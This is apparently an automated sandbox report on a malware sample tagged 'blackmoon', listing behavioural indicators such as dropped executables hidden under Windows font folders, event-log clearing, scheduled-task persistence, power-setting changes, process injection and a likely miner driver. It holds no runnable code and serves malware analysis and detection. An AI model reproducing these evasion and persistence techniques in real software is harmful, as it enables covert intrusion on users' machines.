blackmoon | 25e82d1cbd6cc1ab2465d6f86743a319b829952532f379f71541e0910d4d9878

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 4 IoCs

pid	Process
2344	fuaciw.exe
3968	fuaciw.exe
648	czmpeh.exe
5444	lafuza.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4560-0-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/memory/4560-5-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/files/0x0007000000023591-7.dat	upx
behavioral2/memory/2344-12-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/memory/3968-13-0x0000000000400000-0x0000000000695000-memory.dmp	upx
behavioral2/files/0x00070000000235a4-598.dat	upx
behavioral2/memory/5444-600-0x00007FF6D6A40000-0x00007FF6D705F000-memory.dmp	upx
behavioral2/memory/5444-608-0x00007FF6D6A40000-0x00007FF6D705F000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
800	powershell.EXE
1880	powershell.EXE

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
400	cmd.exe

Power Settings 1 TTPs 6 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
752	cmd.exe
1192	cmd.exe
5144	powercfg.exe
5588	cmd.exe
4560	cmd.exe
4936	powercfg.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	fuaciw.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	fuaciw.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	fuaciw.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	fuaciw.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\efnqlspo	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1880 set thread context of 5068	1880	powershell.EXE	112
PID 800 set thread context of 5920	800	powershell.EXE	114

Drops file in Windows directory 16 IoCs

description	ioc	Process
File created	\??\c:\windows\fonts\yfcmpley\config.json	fuaciw.exe
File created	\??\c:\windows\fonts\dlzcj\HighPower.pow	fuaciw.exe
File opened for modification	\??\c:\windows\fonts\dlzcj\fuaciw.exe	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
File created	\??\c:\windows\fonts\iewulbec\mhfqddd.exe	fuaciw.exe
File created	\??\c:\windows\fonts\yfcmpley\WinRing0x64.sys	fuaciw.exe
File opened for modification	C:\Windows\Tasks\$ulzffmfbeiyhiwgd.job	czmpeh.exe
File opened for modification	C:\Windows\Tasks\$ulzffmfbxlcfuzgu.job	czmpeh.exe
File created	\??\c:\windows\fonts\yfcmpley\lafuza.exe	fuaciw.exe
File opened for modification	\??\c:\windows\fonts\yfcmpley\lafuza.exe	fuaciw.exe
File created	C:\Windows\Tasks\$ulzffmfbxlcfuzgu.job	czmpeh.exe
File created	\??\c:\windows\ime\iwmogqr\ogfrlvb.exe	fuaciw.exe
File created	\??\c:\windows\fonts\dlzcj\BestPower.pow	fuaciw.exe
File opened for modification	\??\c:\windows\fonts\yfcmpley\config.json	lafuza.exe
File created	\??\c:\windows\fonts\dlzcj\fuaciw.exe	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
File created	C:\Windows\Tasks\$ulzffmfbeiyhiwgd.job	czmpeh.exe
File opened for modification	\??\c:\windows\ime\iwmogqr\ogfrlvb.exe	fuaciw.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
756	5588	WerFault.exe	133

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	czmpeh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fuaciw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fuaciw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4440	PING.EXE
5084	cmd.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={959410B1-FAB7-4847-9BA4-83055CD2FC1B}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 03 Sep 2024 15:19:57 GMT"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1725376796"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	fuaciw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4440	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3428	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
2344	fuaciw.exe
2344	fuaciw.exe
3968	fuaciw.exe
3968	fuaciw.exe
3968	fuaciw.exe
3968	fuaciw.exe
1880	powershell.EXE
1880	powershell.EXE
1880	powershell.EXE
800	powershell.EXE
800	powershell.EXE
800	powershell.EXE
1880	powershell.EXE
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
5068	dllhost.exe
800	powershell.EXE
5068	dllhost.exe
5068	dllhost.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
Token: SeDebugPrivilege	2344	fuaciw.exe
Token: SeDebugPrivilege	3968	fuaciw.exe
Token: SeDebugPrivilege	3968	fuaciw.exe
Token: SeDebugPrivilege	1880	powershell.EXE
Token: SeDebugPrivilege	800	powershell.EXE
Token: SeDebugPrivilege	1880	powershell.EXE
Token: SeDebugPrivilege	5068	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2100	svchost.exe
Token: SeIncreaseQuotaPrivilege	2100	svchost.exe
Token: SeSecurityPrivilege	2100	svchost.exe
Token: SeTakeOwnershipPrivilege	2100	svchost.exe
Token: SeLoadDriverPrivilege	2100	svchost.exe
Token: SeSystemtimePrivilege	2100	svchost.exe
Token: SeBackupPrivilege	2100	svchost.exe
Token: SeRestorePrivilege	2100	svchost.exe
Token: SeShutdownPrivilege	2100	svchost.exe
Token: SeSystemEnvironmentPrivilege	2100	svchost.exe
Token: SeUndockPrivilege	2100	svchost.exe
Token: SeManageVolumePrivilege	2100	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2100	svchost.exe
Token: SeIncreaseQuotaPrivilege	2100	svchost.exe
Token: SeSecurityPrivilege	2100	svchost.exe
Token: SeTakeOwnershipPrivilege	2100	svchost.exe
Token: SeLoadDriverPrivilege	2100	svchost.exe
Token: SeSystemtimePrivilege	2100	svchost.exe
Token: SeBackupPrivilege	2100	svchost.exe
Token: SeRestorePrivilege	2100	svchost.exe
Token: SeShutdownPrivilege	2100	svchost.exe
Token: SeSystemEnvironmentPrivilege	2100	svchost.exe
Token: SeUndockPrivilege	2100	svchost.exe
Token: SeManageVolumePrivilege	2100	svchost.exe
Token: SeAuditPrivilege	2668	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2100	svchost.exe
Token: SeIncreaseQuotaPrivilege	2100	svchost.exe
Token: SeSecurityPrivilege	2100	svchost.exe
Token: SeTakeOwnershipPrivilege	2100	svchost.exe
Token: SeLoadDriverPrivilege	2100	svchost.exe
Token: SeSystemtimePrivilege	2100	svchost.exe
Token: SeBackupPrivilege	2100	svchost.exe
Token: SeRestorePrivilege	2100	svchost.exe
Token: SeShutdownPrivilege	2100	svchost.exe
Token: SeSystemEnvironmentPrivilege	2100	svchost.exe
Token: SeUndockPrivilege	2100	svchost.exe
Token: SeManageVolumePrivilege	2100	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2100	svchost.exe
Token: SeIncreaseQuotaPrivilege	2100	svchost.exe
Token: SeSecurityPrivilege	2100	svchost.exe
Token: SeTakeOwnershipPrivilege	2100	svchost.exe
Token: SeLoadDriverPrivilege	2100	svchost.exe
Token: SeSystemtimePrivilege	2100	svchost.exe
Token: SeBackupPrivilege	2100	svchost.exe
Token: SeRestorePrivilege	2100	svchost.exe
Token: SeShutdownPrivilege	2100	svchost.exe
Token: SeSystemEnvironmentPrivilege	2100	svchost.exe
Token: SeUndockPrivilege	2100	svchost.exe
Token: SeManageVolumePrivilege	2100	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2100	svchost.exe
Token: SeIncreaseQuotaPrivilege	2100	svchost.exe
Token: SeSecurityPrivilege	2100	svchost.exe
Token: SeTakeOwnershipPrivilege	2100	svchost.exe
Token: SeLoadDriverPrivilege	2100	svchost.exe
Token: SeSystemtimePrivilege	2100	svchost.exe
Token: SeBackupPrivilege	2100	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5444	lafuza.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe
2344	fuaciw.exe
3968	fuaciw.exe
648	Conhost.exe
112	Conhost.exe
5132	Conhost.exe
3620	Conhost.exe
4504	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3460	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4560 wrote to memory of 5084	4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe	90
PID 4560 wrote to memory of 5084	4560	f7d2291661596daaebefab97d8fed04a28c1eca931738fd0dc163800ce05ebca.exe	90
